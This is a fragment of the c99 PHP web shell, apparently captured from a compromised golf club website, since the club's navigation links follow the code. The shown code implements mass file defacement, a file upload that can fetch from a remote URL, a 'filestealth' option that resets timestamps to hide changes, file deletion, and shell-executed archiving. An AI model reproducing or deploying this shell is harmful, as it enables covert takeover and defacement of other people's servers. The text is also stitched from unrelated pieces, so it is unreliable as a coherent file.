";} echo " Deface for (file/directory name):   - regexp
Deface in (explode \";\"):

Search text:
".htmlspecialchars($deface_text)."

- regexp    - whole words only    - case sensitive    - find files NOT containing the text
- PREVIEW AFFECTED FILES

Html of deface:
".htmlspecialchars($deface_html)."


"; if ($act == "ls") {echo "

---

Deface took ".$defacetime." secs

";} } if ($act == "search") { if (empty($search_in)) {$search_in = $d;} if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} if (empty($search_text_wwo)) {$search_text_regexp = 0;} if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $a = array ( "name"=>$search_name, "name_regexp"=>$search_name_regexp, "text"=>$search_text, "text_regexp"=>$search_text_regxp, "text_wwo"=>$search_text_wwo, "text_cs"=>$search_text_cs, "text_not"=>$search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(";",$search_in)); foreach($in as $v) { c99fsearch($v); } $searchtime = round(getmicrotime()-$searchtime,4); if (count($found) == 0) {echo "No files found!";} else { $ls_arr = $found; $disp_fullpath = true; $act = $dspact = "ls"; } } echo "
Search for (file/directory name):   - regexp
Search in (explode \";\"):

Text:
".htmlspecialchars($search_text)."

- regexp    - whole words only    - case sensitive    - find files NOT containing the text


"; if ($act == "ls") {echo "

---

Search took ".$searchtime." secs

";} } if ($act == "upload") { $uploadmess = ""; $uploadpath = str_replace("\\","/",$uploadpath); if (empty($uploadpath)) {$uploadpath = $d;} elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";} if (!empty($submit)) { global $HTTP_POST_FILES; $uploadfile = $HTTP_POST_FILES["uploadfile"]; if (!empty($uploadfile[tmp_name])) { if (empty($uploadfilename)) {$destin = $uploadfile[name];} else {$destin = $userfilename;} if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!
";} } elseif (!empty($uploadurl)) { if (!empty($uploadfilename)) {$destin = $uploadfilename;} else { $destin = explode("/",$destin); $destin = $destin[count($destin)-1]; if (empty($destin)) { $i = 0; $b = ""; while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} } if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
";} else { $st = getmicrotime(); $content = @file_get_contents($uploadurl); $dt = round(getmicrotime()-$st,4); if (!$content) {$uploadmess .= "Can't download file!
";} else { if ($filestealth) {$stat = stat($uploadpath.$destin);} $fp = fopen($uploadpath.$destin,"w"); if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
";} else { fwrite($fp,$content,strlen($content)); fclose($fp); if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} } } } } } if ($miniform) { echo "".$uploadmess.""; $act = "ls"; } else { echo "File upload:
".$uploadmess."
Select file on your local computer:
               or
Input URL:

Save this file dir:

File-name (auto-fill):

 convert file name to lovercase


"; } } if ($act == "delete") { $delerr = ""; foreach ($actbox as $v) { $result = false; if (empty($v)) {} $result = fs_rmobj($v); if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
";} if (!empty($delerr)) {echo "Deleting with errors:
".$delerr;} } } if ($act == "deface") { $deferr = ""; foreach ($actbox as $v) { $result = false; if (empty($v)) {} $result = fopen(); if (!$result) {$deferr .= "Can't delete ".htmlspecialchars($v)."
";} if (!empty($delerr)) {echo "Deleting with errors:
".$deferr;} } } if (!$usefsbuff) { if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.";} } else { if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";} if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";} if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} elseif ($actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;} } elseif ($actarcbuff) { $arcerr = ""; if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} else {$ext = ".tar.gz";} if ($ext == ".tar.gz") { $cmdline = "tar cfzv"; } $objects = array_merge($sess_data["copy"],$sess_data["cut"]); foreach($objects as $v) { $v = str_replace("\\","/",$v); if (is_dir($v)) { if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";} $v .= "*"; } $cmdline .= " ".$v; } $ret = `$cmdline`; if (empty($ret)) {$arcerr .= "Can't call archivator!
";} $ret = str_replace("\r\n","\n"); $ret = explode("\n",$ret); if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} foreach($sess_data["cut"] as $k=>$v) { if (in_array($v,$ret)) {fs_rmobj($v);} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($arcerr)) {echo "Archivation errors:
".$arcerr;} $act = "ls"; } elseif ($actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;} } } if ($act == "ls") { if (count($ls_arr) > 0) {$list = $ls_arr;} else { $list = array(); if ($h = @opendir($d)) { while ($o = readdir($h)) {$list[] = $d.$o;} closedir($h); } } if (count($list) == 0) {echo "Can't open directory (".htmlspecialchars($d).")!";} else { //Building array $tab = array(); $amount = count($ld)+count($lf); $vd = "f"; //Viewing mode if ($vd == "f") { $row = array(); $row[] = "Name"; $row[] = "Size"; $row[] = "Modify"; if (!$win) {$row[] = "Owner/Group";} $row[] = "Perms"; $row[] = "Action"; $k = $sort[0]; if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;} if ($sort[1] == "a") { $y = ""; } else { $y = ""; } $row[$k] .= $y; for($i=0;$i".$row[$i]."";} } $tab = array(); $tab[cols] = array($row); $tab[head] = array(); $tab[dirs] = array(); $tab[links] = array(); $tab[files] = array(); foreach ($list as $v) { $o = basename($v); $dir = dirname($v); if ($disp_fullpath) {$disppath = $v;} else {$disppath = $o;} $disppath = str2mini($disppath,60); if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} $uo = urlencode($o); $ud = urlencode($dir); $uv = urlencode($v); $row = array(); if ($o == ".") { $row[] = " ".$o.""; $row[] = "LINK"; } elseif ($o == "..") { $row[] = " ".$o.""; $row[] = "LINK"; } elseif (is_dir($v)) { if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";} else {$type = "DIR";} $row[] = " [".$disppath."]"; $row[] = $type; } elseif(is_file($v)) { $ext = explode(".",$o); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $row[] = " ".$disppath.""; $row[] = view_size(filesize($v)); } $row[] = date("d.m.Y H:i:s",filemtime($v)); if (!$win) { $ow = @posix_getpwuid(fileowner($v)); $gr = @posix_getgrgid(filegroup($v)); $row[] = $ow["name"]."/".$gr["name"]; } if (is_writable($v)) {$row[] = "".view_perms(fileperms($v))."";} else {$row[] = "".view_perms(fileperms($v))."";} if (is_dir($v)) {$row[] = " ";} else {$row[] = "   ";} if (($o == ".") or ($o == "..")) {$tab[head][] = $row;} elseif (is_link($v)) {$tab[links][] = $row;} elseif (is_dir($v)) {$tab[dirs][] = $row;} elseif (is_file($v)) {$tab[files][] = $row;} } } $v = $sort[0]; function tabsort($a, $b) { global $v;

Committees

Management

Ladies Committee

Mens Committee

Trustees Birr Golf Club

Back to Member Info